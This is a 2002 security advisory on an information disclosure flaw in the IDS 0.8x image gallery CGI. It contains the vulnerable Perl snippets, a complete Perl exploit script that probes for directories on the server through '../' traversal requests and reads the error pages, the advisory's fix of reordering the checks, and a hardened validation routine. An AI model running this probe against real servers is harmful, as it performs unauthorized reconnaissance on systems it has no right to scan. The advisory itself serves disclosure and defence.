5th Jun 2002 [SBWID-5408]
COMMAND
IDS information disclosure vulnerability
SYSTEMS AFFECTED
version 0.8x
PROBLEM
isox@chainsawbeer.com pointed out:
There is an information disclosure vulnerability in IDS 0.8x (assume
other versions vulnerable). IDS is a CGI-based image thumbnail
gallery. When an attacker sends the variable album a traversed
directory (i.e. /../../../../home/foobar) it is possible to tell if the
specified directory exists by examining the returned error page. This
is possible due to the following snippet of code:
idsShared.pm::getAlbumToDisplay()
=================================
# The existence test (-e) runs first, and only afterwards is the name checked for "..":
if ($albumtodisplay ne '/' && !-e $ppath . "albums/$albumtodisplay") { # does this album exist?
    bail ("Sorry, the album \"$albumtodisplay\" doesn't exist: $!");
}
if ($albumtodisplay =~ /\.\./) { # hax0r protection...
    bail ("Sorry, invalid directory name: $!");
}
Also note there is the same type of information disclosure
vulnerability in index.cgi via the following code (I have just not
verified if it is exploitable, although it obviously seems as though it
is):
index.cgi::processData()
========================
if ($mode eq 'image') {
    getAlbumToDisplay();
    $imagetodisplay = $query->param('image') || bail ("Sorry, no image name was provided: $!");
    # Again the -e test precedes the ".." check below:
    unless (-e "albums$albumtodisplay/$imagetodisplay") { # does this album exist?
        bail ("Sorry, the image \"albums$albumtodisplay/$imagetodisplay\" doesn't exist: $!");
    }
}
if (($imagetodisplay =~ /\.\./) || ($albumtodisplay =~ /\.\./)) {
    bail ("Directory/image paths must not include \"../\".");
}
Exploit
========
#!/usr/bin/perl -w
#
# ids-inform.pl (05/27/2002)
#
# Image Display System 0.8x Information Disclosure Exploit.
# Checks for existance of specified directory.
#
# By: isox [isox@chainsawbeer.com]
#
# usage: self explanitory
# my spelling: bad
#
# Hi Cody, You should be proud, I coded for you!
# Hi YpCat, Your perl is k-rad and pheersom.
#
#######
# URL #
#######
# http://0xc0ffee.com
# http://hhp-programming.net
#
#################
# Advertisement #
#################
#
# Going to Defcon X this year? Well come to the one and only Dennys at Defcon breakfast.
# This is quickly becoming a yearly tradition put on by isox. Check 0xc0ffee.com for
# more information.
#
$maxdepth = 30;      # number of "/.." components prepended to the directory
$dotdot   = '';      # initialised so -w does not warn on the first append
&Banner;
if ($#ARGV < 3) {
    die("Usage $0 <directory> <http://host/path/to/index.cgi> <host> <port>\n");
}
for ($t = 0; $t < $maxdepth; $t++) {
    $dotdot = "$dotdot" . "/..";
}
# The server answers with the ".." error only when the -e test passed,
# i.e. when the directory exists; otherwise the "doesn't exist" page comes back.
$query = "GET $ARGV[1]" . "?mode=album&album=$dotdot/$ARGV[0]\n\n";
$blahblah = &Directory($query, $ARGV[2], $ARGV[3]);
if ($blahblah =~ /Sorry, invalid directory name/) {
    print("$ARGV[0] Exists.\n");
} else {
    print("$ARGV[0] Does Not Exist.\n");
}
exit 0;

sub Banner {
    print("IDS Information Disclosure Exploit\n");
    print("Written by isox [isox\@chainsawbeer.com]\n\n");
}

# Send one raw request and return up to 8192 bytes of the response.
sub Directory {
    use IO::Socket::INET;
    my ($query, $host, $port) = @_;
    $sock = new IO::Socket::INET(
        PeerAddr => $host,
        PeerPort => $port,
        Timeout  => 8,
        Proto    => 'tcp'
    );
    if (!$sock) {
        die("sock: timed out\n");
    }
    print $sock $query;
    read($sock, $buf, 8192);
    close($sock);
    return $buf;
}
SOLUTION
The fix is simple: just flip the if statements around so the check for
..'s comes first.
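A hardened getAlbumToDisplay() with the checks in the corrected order, given here as an added example that is not part of the advisory or of IDS itself. It assumes, as the snippet above does, a bail() that aborts the request with a message and an install prefix in $ppath; the subroutine name, the sample prefix and the test inputs are constructed for the example. It also goes a step beyond the advisory's fix by allow-listing the name syntax and dropping $! from the error text, so the response no longer depends on what lies outside albums/.

```perl
#!/usr/bin/perl
# Hardened album-name validation. Added example, not IDS code: $ppath and
# bail() are assumed from the advisory snippet; the sub name is hypothetical.
use strict;
use warnings;
use File::Spec;

my $ppath = "/var/www/ids/";    # assumed install prefix

sub bail { die "$_[0]\n" }      # stands in for IDS's bail(): abort with a message

# Resolve an album name to a directory under $ppath/albums, or bail.
# Order matters: the traversal check runs before any filesystem test, so
# the reply can no longer reveal whether a path outside albums/ exists.
sub get_album_to_display {
    my ($albumtodisplay) = @_;
    $albumtodisplay = '/' unless defined $albumtodisplay && length $albumtodisplay;

    # 1. Allow-list the syntax: "/" or slash-separated segments of safe
    #    characters, with "." and ".." segments explicitly refused.
    unless ($albumtodisplay eq '/'
            || ($albumtodisplay =~ m{\A(?:/[A-Za-z0-9_.-]+)+\z}
                && $albumtodisplay !~ m{/\.\.?(?:/|\z)})) {
        bail("Sorry, invalid directory name.");
    }

    # 2. Belt and braces: after logical cleanup the assembled path must
    #    still start with the albums root.
    my $root   = File::Spec->catdir($ppath, 'albums');
    my $target = File::Spec->canonpath($root . $albumtodisplay);
    bail("Sorry, invalid directory name.") unless index($target, $root) == 0;

    # 3. Only now consult the disk, and only inside the albums tree.
    #    $! is deliberately not echoed: it would distinguish ENOENT from EACCES.
    bail("Sorry, that album doesn't exist.") unless -d $target;
    return $target;
}

# Constructed inputs: the traversal attempts are rejected before any stat()
# call, so their reply is the same whether or not /home/foobar exists.
for my $name ('/', '/vacation', '/../../../../home/foobar', '/vacation/../../etc') {
    my $result = eval { get_album_to_display($name) } // "rejected: $@";
    chomp $result;
    print "$name => $result\n";
}
```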